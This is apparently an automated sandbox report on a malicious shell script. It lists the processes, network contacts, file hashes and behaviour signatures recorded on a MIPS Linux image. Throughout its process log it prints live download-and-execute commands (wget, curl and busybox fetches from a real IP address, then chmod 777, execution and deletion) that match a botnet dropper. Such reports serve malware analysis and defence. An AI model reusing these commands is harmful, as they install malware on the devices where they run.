/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

debian9-mipsel-20240611-en

Max time kernel

84s

Max time network

86s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

